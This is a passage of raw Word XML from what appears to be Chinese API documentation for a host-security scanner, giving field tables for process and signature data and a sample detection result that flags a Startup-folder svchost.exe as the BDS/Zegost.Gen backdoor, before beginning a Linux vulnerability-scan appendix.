          </w:tcPr>
          <w:p w14:paraId="407E08CD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>父进程PID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1F680BA3" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="16D4537D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>parentPath</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A93AB8A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E28B1C3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A385D82" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>父进程路径</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="036465A7" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="759323A9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>parentUserName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="28CBF41F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33610821" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C819CAD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>父进程所属用户</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3D9C721D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>winSignInfoDtos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 结构签名信息：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1325"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="1004"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="4B26A08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5D29016" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="69EE75C1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C285E2D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33B1E839" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6A1EB195" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="23EA5D3A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>subjectUser</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="71073449" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C6DD9E4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D4CE5F4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>使用者</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6C515346" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="368F8935" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>issuer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B8F7532" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="098FC8D2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C17E8F8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>颁发者</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="64E789BE" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06F494E7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>beginTime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="700107C1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72936CE6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1CC5A214" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>开始时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6A3E54A5" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="219C2BDF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>endTime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F4BC86C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1954E334" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="689D010E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>结束时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7442209E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27EA5612" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>Data:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">  {\"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\" : \"Administrator\",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">  \"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\" : 2940,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">  \"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>processPath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\" : \"C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\svchost.exe\",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">  \"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>processName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\" : \"svchost.exe\",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">  \"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cmdline</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\" : \"\\\"C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\svchost.exe\\\" \",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">  \"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>parentProcessName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\" : \"Explorer.EXE\",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">  \"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>parentPid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\" : 2180,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">  \"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>parentPath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\" : \"C:\\\\Windows\\\\Explorer.EXE\",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">  \"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>parentUserName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\" : \"Administrator\",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  \"path\" : \"C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\svchost.exe\",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">  \"size\" : 1662736,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">  \"type\" : \"PE32\",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">  \"user\" : \"Administrators\",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">  \"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>changeTime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\" : 1546394239,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">  \"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>modifyTime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\" : 1481516590,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">  \"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>accessTime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\" : 1546394239,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">  \"md5\" : \"323443b3069a12499a0ca1d1d6ccd7ee\",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">  \"sha1\" : \"1c966941cee961286522f8cc1ac409d13c2d1b65\",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">  \"sha256\" : \"\",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">   \"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>winSignInfoDtos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\":[{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    \"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>subjectUser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">":"Beijing </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Sogou</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Technology Development Co., Ltd.",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    \"issuer\":\"VeriSign Class 3 Code Signing 2010 CA\",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    \"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>beginTime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\":1569599999,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    \"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>endTime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\":1504713600</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">  }]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">  \"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ruleResults</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\" : [ {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">  \"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>virusName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\" : \"BDS/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Zegost.Gen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">  \"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>virusDescription</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\" : \"Contains a detection pattern of the (dangerous) backdoor program BDS/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Zegost.Gen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Backdoor server programs\",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">  \"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>libUpdateTime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\" : 1534953600,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">  \"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>libName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\" : \"Avira\",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  \"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>virusInstruct</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\" : null  } ]}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F4B000" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="505" w:name="_Toc115166325"/>
      <w:bookmarkStart w:id="506" w:name="附录3-linux漏洞检测-查询结果-data数据结构"/>
      <w:bookmarkEnd w:id="480"/>
      <w:bookmarkEnd w:id="504"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>附录3 Linux漏洞检测-查询结果-data数据结构</w:t>
      </w:r>
      <w:bookmarkEnd w:id="505"/>
    </w:p>
    <w:p w14:paraId="3D10EA6F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回说明：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1842"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="1430"/>
        <w:gridCol w:w="5716"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="0706655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CFE7685" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5915B01F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30126D01" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4DEC8DBD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7D0B266E" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B6AF16F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70BCEA97" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A8096B2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5221FD9C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>执行状态的状态码, 0表示成功</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3FAA8AD6" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2FCE4538" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>execute_type</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1742478B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="64BF5CEF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C5D3AEE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>检测方式，1 版本比对 2：POC检测 3：版本比对和POC检测</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="04E1B73F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C9D0D6F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cve_id</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00191F10" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5EC96414" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
